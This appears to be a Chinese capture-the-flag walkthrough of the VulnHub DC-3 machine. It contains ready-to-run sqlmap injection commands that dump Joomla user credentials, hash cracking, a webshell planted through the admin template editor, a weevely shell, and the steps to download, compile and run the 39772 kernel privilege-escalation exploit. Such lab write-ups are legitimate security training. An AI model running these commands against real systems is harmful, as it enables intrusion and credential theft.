下载地址

https://www.vulnhub.com/entry/dc-3,312/

 

 

实战步骤

首先我们打开靶机

用nmap探测主机

应该是152，探测一下端口

只开了个80，访问看看

是一个joomla的cms，我们需要确定cms的版本，然后看看有没有能利用的漏洞。我们用如下命令：

joomscan --url http://192.168.220.136

确定版本，joomla3.7.0，用searchsploit工具查找Joomla 3.7.0 版本存在的漏洞

searchsploit Joomla 3.7.0

发现一个sql注入的漏洞

将sql注入漏洞相关介绍文档保存到本地，并查看相关注入方法

cp /usr/share/exploitdb/exploits/PHP/webapps/42033.txt sql.txt

cat sql.txt

使用注入方法：

看一下我们现在用的joomladb

sqlmap -u "http://192.168.207.152/index.PHP?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

再看一下users那个表

sqlmap -u "http://192.168.207.152/index.PHP?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

值得注意的是name和password

sqlmap -u "http://192.168.207.152/index.PHP?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

得到用户名和加密的密码。将密文保存在一个文件中

vim 111

使用john爆破hash值

得到密码snoopy

我们需要进入后台，查找得知administrator是joomla默认的后台地址，我们尝试访问

进来了，哈哈，用刚才获取的账户密码登陆

进入后台，翻一翻有没有能上传文件的地方

这里有个New File，尝试搞个一句话

用蚁剑连接

成功连上

接下来用weevely反弹个shell出来

把shell.PHP上传到主机上

用kali连接

拿到shell，可很明显我们要的东西应该在root文件夹下，要进行提权处理，搜索本机信息

查看内核版本

ubantu 16.04，去看看有什么提取方法。使用searchsploit

 

这个可以用来提权，尝试使用

去下载，解压之后上传到目标主机（需要翻墙）

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

最后的文件，上传过去

进入到tmp文件夹依次执行

unzip 39772.zip 

cd 39772

tar -xvf exploit.tar 

cd ebpf_mapfd_doubleput_exploit

./compile.sh 

./doubleput 

等待一会，提权成功，游戏结束

 

 

总结

看一下整体思路：

1、确定cms版本

2、针对版本找目录

3、找上传点，上传一句话，蚁剑连接

4、用weevely反弹个shell出来

5、确定内核版本，找对应漏洞

6、提权，over